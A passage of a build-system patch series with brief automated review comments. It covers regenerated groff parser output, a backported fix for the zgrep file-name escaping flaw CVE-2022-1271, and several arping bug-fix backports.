--#line 253 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 257 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new vcenter_box((yyvsp[0].b)); }
--#line 1797 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1812 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 55:
--#line 255 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 259 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_special_box((yyvsp[-1].str), (yyvsp[0].b)); }
--#line 1803 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1818 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 56:
--#line 260 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 264 "src/preproc/eqn/eqn.ypp"
- {
- int n;
- if (sscanf((yyvsp[0].str), "%d", &n) == 1)
- (yyval.n) = n;
- a_delete (yyvsp[0].str);
- }
--#line 1814 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1829 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 57:
--#line 270 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 274 "src/preproc/eqn/eqn.ypp"
- { (yyval.pb) = new pile_box((yyvsp[0].b)); }
--#line 1820 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1835 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 58:
--#line 272 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 276 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[-2].pb)->append((yyvsp[0].b)); (yyval.pb) = (yyvsp[-2].pb); }
--#line 1826 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1841 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 59:
--#line 277 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 281 "src/preproc/eqn/eqn.ypp"
- { (yyval.pb) = (yyvsp[-1].pb); }
--#line 1832 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1847 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 60:
--#line 279 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 283 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[-1].pb)->set_space((yyvsp[-3].n)); (yyval.pb) = (yyvsp[-1].pb); }
--#line 1838 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1853 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 61:
--#line 284 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 288 "src/preproc/eqn/eqn.ypp"
- { (yyval.mb) = new matrix_box((yyvsp[0].col)); }
--#line 1844 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1859 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 62:
--#line 286 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 290 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[-1].mb)->append((yyvsp[0].col)); (yyval.mb) = (yyvsp[-1].mb); }
--#line 1850 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1865 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 63:
--#line 291 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 295 "src/preproc/eqn/eqn.ypp"
- { (yyval.col) = new column((yyvsp[0].b)); }
--#line 1856 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1871 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 64:
--#line 293 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 297 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[-2].col)->append((yyvsp[0].b)); (yyval.col) = (yyvsp[-2].col); }
--#line 1862 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1877 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 65:
--#line 298 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 302 "src/preproc/eqn/eqn.ypp"
- { (yyval.col) = (yyvsp[-1].col); }
--#line 1868 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1883 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 66:
--#line 300 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 304 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[-1].col)->set_space((yyvsp[-3].n)); (yyval.col) = (yyvsp[-1].col); }
--#line 1874 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1889 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 67:
--#line 305 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 309 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[0].col)->set_alignment(CENTER_ALIGN); (yyval.col) = (yyvsp[0].col); }
--#line 1880 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1895 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 68:
--#line 307 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 311 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[0].col)->set_alignment(LEFT_ALIGN); (yyval.col) = (yyvsp[0].col); }
--#line 1886 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1901 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 69:
--#line 309 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 313 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[0].col)->set_alignment(RIGHT_ALIGN); (yyval.col) = (yyvsp[0].col); }
--#line 1892 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1907 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 70:
--#line 311 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 315 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[0].col)->set_alignment(CENTER_ALIGN); (yyval.col) = (yyvsp[0].col); }
--#line 1898 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1913 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 71:
--#line 315 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 319 "src/preproc/eqn/eqn.ypp"
- { (yyval.str) = (yyvsp[0].str); }
--#line 1904 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1919 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 72:
--#line 317 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 321 "src/preproc/eqn/eqn.ypp"
- { (yyval.str) = (yyvsp[0].str); }
--#line 1910 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1925 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 73:
--#line 322 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 326 "src/preproc/eqn/eqn.ypp"
- { (yyval.str) = (yyvsp[0].str); }
--#line 1916 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1931 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 74:
--#line 324 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 328 "src/preproc/eqn/eqn.ypp"
- { (yyval.str) = strsave("{"); }
--#line 1922 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1937 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 75:
--#line 326 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 330 "src/preproc/eqn/eqn.ypp"
- { (yyval.str) = strsave("}"); }
--#line 1928 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1943 "src/preproc/eqn/eqn.cpp"
- break;
-
-
--#line 1932 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1947 "src/preproc/eqn/eqn.cpp"
-+
- default: break;
- }
- /* User semantic actions sometimes alter yychar, and that requires
-@@ -2042,12 +2058,10 @@ yyerrlab:
- | yyerrorlab -- error raised explicitly by YYERROR. |
- `---------------------------------------------------*/
- yyerrorlab:
--
-- /* Pacify compilers like GCC when the user code never invokes
-- YYERROR and the label yyerrorlab therefore never appears in user
-- code. */
-- if (/*CONSTCOND*/ 0)
-- goto yyerrorlab;
-+ /* Pacify compilers when the user code never invokes YYERROR and the
-+ label yyerrorlab therefore never appears in user code. */
-+ if (0)
-+ YYERROR;
-
- /* Do not reclaim the symbols of the rule whose action triggered
- this YYERROR. */
-@@ -2109,6 +2123,7 @@ yyacceptlab:
- yyresult = 0;
- goto yyreturn;
-
-+
- /*-----------------------------------.
- | yyabortlab -- YYABORT comes here. |
- `-----------------------------------*/
-@@ -2116,6 +2131,7 @@ yyabortlab:
- yyresult = 1;
- goto yyreturn;
-
-+
- #if !defined yyoverflow || YYERROR_VERBOSE
- /*-------------------------------------------------.
- | yyexhaustedlab -- memory exhaustion comes here. |
-@@ -2126,6 +2142,10 @@ yyexhaustedlab:
- /* Fall through. */
- #endif
-
-+
-+/*-----------------------------------------------------.
-+| yyreturn -- parsing is finished, return the result. |
-+`-----------------------------------------------------*/
- yyreturn:
- if (yychar != YYEMPTY)
- {
-@@ -2155,5 +2175,5 @@ yyreturn:
- #endif
- return yyresult;
- }
--#line 329 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1903 */
-+#line 333 "src/preproc/eqn/eqn.ypp"
-
-diff --git a/src/preproc/eqn/eqn.hpp b/src/preproc/eqn/eqn.hpp
-index 32a32a5..9a092c1 100644
---- a/src/preproc/eqn/eqn.hpp
-+++ b/src/preproc/eqn/eqn.hpp
-@@ -1,8 +1,9 @@
--/* A Bison parser, made by GNU Bison 3.2. */
-+/* A Bison parser, made by GNU Bison 3.4.1. */
-
- /* Bison interface for Yacc-like parsers in C
-
-- Copyright (C) 1984, 1989-1990, 2000-2015, 2018 Free Software Foundation, Inc.
-+ Copyright (C) 1984, 1989-1990, 2000-2015, 2018-2019 Free Software Foundation,
-+ Inc.
-
- This program is free software: you can redistribute it and/or modify
- it under the terms of the GNU General Public License as published by
-@@ -170,10 +171,9 @@ extern int yydebug;
-
- /* Value type. */
- #if ! defined YYSTYPE && ! defined YYSTYPE_IS_DECLARED
--
- union YYSTYPE
- {
--#line 30 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1906 */
-+#line 34 "src/preproc/eqn/eqn.ypp"
-
- char *str;
- box *b;
-@@ -182,9 +182,9 @@ union YYSTYPE
- int n;
- column *col;
-
--#line 186 "src/preproc/eqn/eqn.hpp" /* yacc.c:1906 */
--};
-+#line 186 "src/preproc/eqn/eqn.hpp"
-
-+};
- typedef union YYSTYPE YYSTYPE;
- # define YYSTYPE_IS_TRIVIAL 1
- # define YYSTYPE_IS_DECLARED 1
diff --git a/src/preproc/eqn/eqn.ypp b/src/preproc/eqn/eqn.ypp
index fb318c3..b7b647e 100644
--- a/src/preproc/eqn/eqn.ypp
diff --git a/meta/recipes-extended/groff/groff_1.22.4.bb b/meta/recipes-extended/groff/groff_1.22.4.bb
index e398478349..f0e9eb6a8a 100644
--- a/meta/recipes-extended/groff/groff_1.22.4.bb
+++ b/meta/recipes-extended/groff/groff_1.22.4.bb
@@ -18,6 +18,9 @@ SRC_URI = "${GNU_MIRROR}/groff/groff-${PV}.tar.gz \
SRC_URI[md5sum] = "08fb04335e2f5e73f23ea4c3adbf0c5f"
SRC_URI[sha256sum] = "e78e7b4cb7dec310849004fa88847c44701e8d133b5d4c13057d876c1bad0293"
+# Remove at the next upgrade
+PR = "r1"
+
DEPENDS = "bison-native"
RDEPENDS_${PN} += "perl sed"
@@ -28,7 +31,14 @@ MULTILIB_SCRIPTS = "${PN}:${bindir}/gpinyin ${PN}:${bindir}/groffer ${PN}:${bind
EXTRA_OECONF = "--without-x --without-doc"
PARALLEL_MAKE = ""
-CACHED_CONFIGUREVARS += "ac_cv_path_PERL='/usr/bin/env perl' ac_cv_path_BASH_PROG='no'"
+CACHED_CONFIGUREVARS += "ac_cv_path_PERL='/usr/bin/env perl' ac_cv_path_BASH_PROG='no' PAGE=A4"
+
+# Delete these generated files since we depend on bison-native
+# and regenerate them. Do it deterministically (always).
+do_configure_prepend() {
+ rm -f ${S}/src/preproc/eqn/eqn.cpp
+ rm -f ${S}/src/preproc/eqn/eqn.hpp
+}
do_install_append() {
# Some distros have both /bin/perl and /usr/bin/perl, but we set perl location
@@ -52,6 +62,10 @@ do_install_append() {
rm -rf ${D}${bindir}/glilypond
rm -rf ${D}${libdir}/groff/glilypond
rm -rf ${D}${mandir}/man1/glilypond*
+
+ # not ship /usr/bin/grap2graph and its releated man files
+ rm -rf ${D}${bindir}/grap2graph
+ rm -rf ${D}${mandir}/man1/grap2graph*
}
do_install_append_class-native() {
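Review bot: The new comment in `do_install_append` says what is removed but not why, and it contains a typo ("releated"). A wording such as `# Do not ship grap2graph and its man pages: <reason>` would tell whoever next upgrades the recipe whether the removal is still needed. The reason is not visible on this page, so `<reason>` is a placeholder for the author to fill in.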
diff --git a/meta/recipes-extended/gzip/gzip-1.10/CVE-2022-1271.patch b/meta/recipes-extended/gzip/gzip-1.10/CVE-2022-1271.patch
new file mode 100644
index 0000000000..046c95df47
--- /dev/null
+++ b/meta/recipes-extended/gzip/gzip-1.10/CVE-2022-1271.patch
@@ -0,0 +1,45 @@
+From 7073a366ee71639a1902eefb7500e14acb920f64 Mon Sep 17 00:00:00 2001
+From: Lasse Collin <lasse.collin@tukaani.org>
+Date: Mon, 4 Apr 2022 23:52:49 -0700
+Subject: [PATCH] zgrep: avoid exploit via multi-newline file names
+
+* zgrep.in: The issue with the old code is that with multiple
+newlines, the N-command will read the second line of input,
+then the s-commands will be skipped because it's not the end
+of the file yet, then a new sed cycle starts and the pattern
+space is printed and emptied. So only the last line or two get
+escaped. This patch makes sed read all lines into the pattern
+space and then do the escaping.
+
+This vulnerability was discovered by:
+cleemy desu wayo working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/gzip.git/commit/?id=dc9740df61e575e8c3148b7bd3c147a81ea00c7c]
+CVE: CVE-2022-1271
+
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+---
+ zgrep.in | 10 +++++++---
+ 1 file changed, 7 insertions(+), 3 deletions(-)
+
+diff --git a/zgrep.in b/zgrep.in
+index 3efdb52..d391291 100644
+--- a/zgrep.in
++++ b/zgrep.in
+@@ -222,9 +222,13 @@ do
+ '* | *'&'* | *'\'* | *'|'*)
+ i=$(printf '%s\n' "$i" |
+ sed '
+- $!N
+- $s/[&\|]/\\&/g
+- $s/\n/\\n/g
++ :start
++ $!{
++ N
++ b start
++ }
++ s/[&\|]/\\&/g
++ s/\n/\\n/g
+ ');;
+ esac
+ sed_script="s|^|$i:|"
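Review bot: The backport carries only the zgrep.in change and no test, so the recipe's ptest run would not notice if the escaping regressed on a later rebase. A case that runs zgrep on a file whose name contains two or more newlines and checks the output prefix would cover it. If I recall correctly, upstream followed this commit with a test and a sed-portability adjustment. It is worth confirming that the sed used on the target accepts the `:start` / `$!{ ... b start }` loop as written. The surrounding `case` statement starts outside the hunk.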
diff --git a/meta/recipes-extended/gzip/gzip_1.10.bb b/meta/recipes-extended/gzip/gzip_1.10.bb
index 9778e687e1..c558c21f10 100644
--- a/meta/recipes-extended/gzip/gzip_1.10.bb
+++ b/meta/recipes-extended/gzip/gzip_1.10.bb
@@ -4,6 +4,7 @@ LICENSE = "GPLv3+"
SRC_URI = "${GNU_MIRROR}/gzip/${BP}.tar.gz \
file://run-ptest \
+ file://CVE-2022-1271.patch \
"
SRC_URI_append_class-target = " file://wrong-path-fix.patch"
diff --git a/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch b/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch
new file mode 100644
index 0000000000..bf86115843
--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch
@@ -0,0 +1,79 @@
+From 86ed08936d49e2c81ef49dfbd02aca1c74d0c098 Mon Sep 17 00:00:00 2001
+From: lac-0073 <61903197+lac-0073@users.noreply.github.com>
+Date: Mon, 26 Oct 2020 09:45:42 +0800
+Subject: [PATCH] arpping: make update neighbours work again
+
+The arping is using inconsistent sender_ip_addr and target_ip_addr in
+messages. This causes the client receiving the arp message not to update
+the arp table entries.
+
+The specific performance is as follows:
+
+There is a machine 2 with IP 10.20.30.3 configured on eth0:0 that is in the
+same IP subnet as eth0. This IP was originally used on another machine 1,
+and th IP needs to be changed back to the machine 1. When using the arping
+command to announce what ethernet address has IP 10.20.30.3, the arp table
+on machine 3 is not updated.
+
+Machine 3 original arp table:
+
+ 10.20.30.3 machine 2 eth0:0 00:00:00:00:00:02
+ 10.20.30.2 machine 2 eth0 00:00:00:00:00:02
+ 10.20.30.1 machine 1 eth0 00:00:00:00:00:01
+
+Create interface eth0:0 on machine 1, and use the arping command to send arp
+packets. Expected outcome on machine 3:
+
+ 10.20.30.3 machine 1 eth0:0 00:00:00:00:00:01
+ 10.20.30.2 machine 2 eth0 00:00:00:00:00:02
+ 10.20.30.1 machine 1 eth0 00:00:00:00:00:01
+
+Actual results on machine 3:
+
+ 10.20.30.3 machine 2 eth0:0 00:00:00:00:00:02
+ 10.20.30.2 machine 2 eth0 00:00:00:00:00:02
+ 10.20.30.1 machine 1 eth0 00:00:00:00:00:01
+
+Fixes: https://github.com/iputils/iputils/issues/298
+Fixes: 68f12fc4a0dbef4ae4c404da24040d22c5a14339
+Signed-off-by: Aichun Li <liaichun@huawei.com>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/86ed08936d49e2c81ef49dfbd02aca1c74d0c098]
+Signed-off-by: Visa Hankala <visa@hankala.org>
+---
+ arping.c | 16 +++++++++-------
+ 1 file changed, 9 insertions(+), 7 deletions(-)
+
+diff --git a/arping.c b/arping.c
+index a002786..53fdbb4 100644
+--- a/arping.c
++++ b/arping.c
+@@ -968,7 +968,7 @@ int main(int argc, char **argv)
+ }
+ memset(&saddr, 0, sizeof(saddr));
+ saddr.sin_family = AF_INET;
+- if (!ctl.unsolicited && (ctl.source || ctl.gsrc.s_addr)) {
++ if (ctl.source || ctl.gsrc.s_addr) {
+ saddr.sin_addr = ctl.gsrc;
+ if (bind(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1)
+ error(2, errno, "bind");
+@@ -979,12 +979,14 @@ int main(int argc, char **argv)
+ saddr.sin_port = htons(1025);
+ saddr.sin_addr = ctl.gdst;
+
+- if (setsockopt(probe_fd, SOL_SOCKET, SO_DONTROUTE, (char *)&on, sizeof(on)) == -1)
+- error(0, errno, _("WARNING: setsockopt(SO_DONTROUTE)"));
+- if (connect(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1)
+- error(2, errno, "connect");
+- if (getsockname(probe_fd, (struct sockaddr *)&saddr, &alen) == -1)
+- error(2, errno, "getsockname");
++ if (!ctl.unsolicited) {
++ if (setsockopt(probe_fd, SOL_SOCKET, SO_DONTROUTE, (char *)&on, sizeof(on)) == -1)
++ error(0, errno, _("WARNING: setsockopt(SO_DONTROUTE)"));
++ if (connect(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1)
++ error(2, errno, "connect");
++ if (getsockname(probe_fd, (struct sockaddr *)&saddr, &alen) == -1)
++ error(2, errno, "getsockname");
++ }
+ ctl.gsrc = saddr.sin_addr;
+ }
+ close(probe_fd);
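Review bot: After this change, `ctl.gsrc = saddr.sin_addr;` runs in unsolicited mode without the `connect()`/`getsockname()` pair, so it copies the value set a few lines earlier by `saddr.sin_addr = ctl.gdst;`. That appears intended for unsolicited ARP, where source and target address match, but nothing in the code says so. A comment above the assignment, for example `/* unsolicited mode: no getsockname(), so this is ctl.gdst */`, would make the dependency explicit. The enclosing `else` branch begins outside the hunk, so the exact conditions under which it is reached cannot be confirmed from here.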
diff --git a/meta/recipes-extended/iputils/iputils/0001-arping-revert-partially-fix-sent-vs-received-package.patch b/meta/recipes-extended/iputils/iputils/0001-arping-revert-partially-fix-sent-vs-received-package.patch
new file mode 100644
index 0000000000..8495178879
--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0001-arping-revert-partially-fix-sent-vs-received-package.patch
@@ -0,0 +1,39 @@
+From 18f14be80466ddc8fb17a400be82764a779c8dcd Mon Sep 17 00:00:00 2001
+From: Sami Kerola <kerolasa@iki.fi>
+Date: Wed, 31 Jul 2019 21:28:12 +0100
+Subject: [PATCH] arping: revert partially - fix sent vs received packages
+ return value
+
+Commit 84ca65ca980315c73f929fed8b6f16bbd698c3a0 caused regression. The
+arping -D needs return value evaluation that was the earlier default, in
+other cases the new return value should be correct.
+
+Addresses: https://github.com/iputils/iputils/issues/209
+See-also: https://github.com/void-linux/void-packages/issues/13304
+Signed-off-by: Sami Kerola <kerolasa@iki.fi>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/18f14be80466ddc8fb17a400be82764a779c8dcd]
+Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+---
+ arping.c | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/arping.c b/arping.c
+index 77c9c56..2c87c15 100644
+--- a/arping.c
++++ b/arping.c
+@@ -792,7 +792,11 @@ static int event_loop(struct run_state *ctl)
+ close(tfd);
+ freeifaddrs(ctl->ifa0);
+ rc |= finish(ctl);
+- rc |= (ctl->sent != ctl->received);
++ if (ctl->dad && ctl->quit_on_reply)
++ /* Duplicate address detection mode return value */
++ rc |= !(ctl->brd_sent != ctl->received);
++ else
++ rc |= (ctl->sent != ctl->received);
+ return rc;
+ }
+
+--
+2.18.4
+
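Review bot: The duplicate-address-detection branch uses a double negation, `rc |= !(ctl->brd_sent != ctl->received);`, which is harder to read than the equivalent `rc |= (ctl->brd_sent == ctl->received);`. Since this is a verbatim upstream backport, the code should probably stay as is. The existing comment `/* Duplicate address detection mode return value */` does not say which outcome counts as failure. As written, the exit status is non-zero when the number of replies equals the number of broadcast probes sent, which includes the case where both are zero.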
diff --git a/meta/recipes-extended/iputils/iputils/0002-arping-fix-f-quit-on-first-reply-regression.patch b/meta/recipes-extended/iputils/iputils/0002-arping-fix-f-quit-on-first-reply-regression.patch
new file mode 100644
index 0000000000..a5f40860dc
--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0002-arping-fix-f-quit-on-first-reply-regression.patch
@@ -0,0 +1,39 @@
+From 1df5350bdc952b14901fde356b17b78c2bcd4cff Mon Sep 17 00:00:00 2001
+From: Sami Kerola <kerolasa@iki.fi>
+Date: Wed, 28 Aug 2019 20:05:22 +0100
+Subject: [PATCH] arping: fix -f quit on first reply regression
+
+When arping runs together with -f 'quit on first reply' and -w <timeout>
+'how long to wait for a reply' the command needs to exit if replies are not
+received after wait period. Notice that the exit in case of lost packages
+will be 1 signifying failure. Getting a reply results to 0 exit value.
+
+Addresses: https://bugs.debian.org/935946
+Reported-by: Lucas Nussbaum <lucas@debian.org>
+Addresses: https://github.com/iputils/iputils/issues/211
+Reported-by: Noah Meyerhans <noahm@debian.org>
+Broken-since: 67e070d08dcbec990e1178360f82b3e2ca4f6d5f
+Signed-off-by: Sami Kerola <kerolasa@iki.fi>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/1df5350bdc952b14901fde356b17b78c2bcd4cff]
+Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+---
+ arping.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/arping.c b/arping.c
+index 2c87c15..30884f6 100644
+--- a/arping.c
++++ b/arping.c
+@@ -764,7 +764,8 @@ static int event_loop(struct run_state *ctl)
+ continue;
+ }
+ total_expires += exp;
+- if (0 < ctl->count && (uint64_t)ctl->count < total_expires) {
++ if ((0 < ctl->count && (uint64_t)ctl->count < total_expires) ||
++ (ctl->quit_on_reply && ctl->timeout < total_expires)) {
+ exit_loop = 1;
+ continue;
+ }
+--
+2.18.4
+
diff --git a/meta/recipes-extended/iputils/iputils/0003-arping-Fix-comparison-of-different-signedness-warnin.patch b/meta/recipes-extended/iputils/iputils/0003-arping-Fix-comparison-of-different-signedness-warnin.patch
new file mode 100644
index 0000000000..ebd122c157
--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0003-arping-Fix-comparison-of-different-signedness-warnin.patch
@@ -0,0 +1,37 @@
+From ec821e572a640bd79aecc3922cb9001f4b6b26f2 Mon Sep 17 00:00:00 2001
+From: Petr Vorel <petr.vorel@gmail.com>
+Date: Sat, 7 Sep 2019 06:07:19 +0200
+Subject: [PATCH] arping: Fix comparison of different signedness warning
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+../arping.c:768:45: warning: comparison of integer expressions of different signedness: ‘int’ and ‘uint64_t’ {aka ‘long unsigned int’} [-Wsign-compare]
+ 768 | (ctl->quit_on_reply && ctl->timeout < total_expires)) {
+
+Fixes: 1df5350 ("arping: fix -f quit on first reply regression")
+Reference: https://github.com/iputils/iputils/pull/212
+Acked-by: Sami Kerola <kerolasa@iki.fi>
+Signed-off-by: Petr Vorel <petr.vorel@gmail.com>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/ec821e572a640bd79aecc3922cb9001f4b6b26f2]
+Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+---
+ arping.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/arping.c b/arping.c
+index 2d05728..88319cd 100644
+--- a/arping.c
++++ b/arping.c
+@@ -765,7 +765,7 @@ static int event_loop(struct run_state *ctl)
+ }
+ total_expires += exp;
+ if ((0 < ctl->count && (uint64_t)ctl->count < total_expires) ||
+- (ctl->quit_on_reply && ctl->timeout < total_expires)) {
++ (ctl->quit_on_reply && ctl->timeout < (long)total_expires)) {
+ exit_loop = 1;
+ continue;
+ }
+--
+2.18.4
+
diff --git a/meta/recipes-extended/iputils/iputils/0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch b/meta/recipes-extended/iputils/iputils/0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch
new file mode 100644
index 0000000000..923e06e30b
--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch
@@ -0,0 +1,45 @@
+From 68f12fc4a0dbef4ae4c404da24040d22c5a14339 Mon Sep 17 00:00:00 2001
+From: Sami Kerola <kerolasa@iki.fi>
+Date: Sat, 8 Feb 2020 14:12:18 +0000
+Subject: [PATCH] arping: return success when unsolicited ARP mode destination
+ does not answer
+
+Manual page is making promise answers are not expected when -U (or -A)
+option is in use. Either I am looking wrong or this has been broken since
+at the beginning of git history.
+
+Addresses: https://github.com/iputils/iputils/issues/247
+Signed-off-by: Sami Kerola <kerolasa@iki.fi>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/68f12fc4a0dbef4ae4c404da24040d22c5a14339]
+Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+---
+ arping.c | 6 ++++--
+ 1 file changed, 4 insertions(+), 2 deletions(-)
+
+diff --git a/arping.c b/arping.c
+index 996cf2b..5180ae0 100644
+--- a/arping.c
++++ b/arping.c
+@@ -794,7 +794,9 @@ static int event_loop(struct run_state *ctl)
+ close(tfd);
+ freeifaddrs(ctl->ifa0);
+ rc |= finish(ctl);
+- if (ctl->dad && ctl->quit_on_reply)
++ if (ctl->unsolicited)
++ /* nothing */;
++ else if (ctl->dad && ctl->quit_on_reply)
+ /* Duplicate address detection mode return value */
+ rc |= !(ctl->brd_sent != ctl->received);
+ else
+@@ -943,7 +945,7 @@ int main(int argc, char **argv)
+ }
+ memset(&saddr, 0, sizeof(saddr));
+ saddr.sin_family = AF_INET;
+- if (ctl.source || ctl.gsrc.s_addr) {
++ if (!ctl.unsolicited && (ctl.source || ctl.gsrc.s_addr)) {
+ saddr.sin_addr = ctl.gsrc;
+ if (bind(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1)
+ error(2, errno, "bind");
+--
+2.18.4
+
diff --git a/meta/recipes-extended/iputils/iputils/0005-arping-use-additional-timerfd-to-control-when-timeou.patch b/meta/recipes-extended/iputils/iputils/0005-arping-use-additional-timerfd-to-control-when-timeou.patch
new file mode 100644
index 0000000000..3b8a8244da
--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0005-arping-use-additional-timerfd-to-control-when-timeou.patch
@@ -0,0 +1,94 @@
+From 60a27c76174c0ae23bdafde2bad4fdd18a44a7ea Mon Sep 17 00:00:00 2001
+From: Sami Kerola <kerolasa@iki.fi>
+Date: Sat, 7 Mar 2020 22:03:21 +0000
+Subject: [PATCH] arping: use additional timerfd to control when timeout
+ happens
+
+Trying to determine timeout by adding up interval values is pointlessly
+complicating. With separate timer everything just works.
+
+Addresses: https://github.com/iputils/iputils/issues/259
+Fixes: 1df5350bdc952b14901fde356b17b78c2bcd4cff
+Signed-off-by: Sami Kerola <kerolasa@iki.fi>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/e594ca52afde89746b7d79c875fe9d6aea1850ac]
+Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+---
+ arping.c | 29 ++++++++++++++++++++++++++---
+ 1 file changed, 26 insertions(+), 3 deletions(-)
+
+diff --git a/arping.c b/arping.c
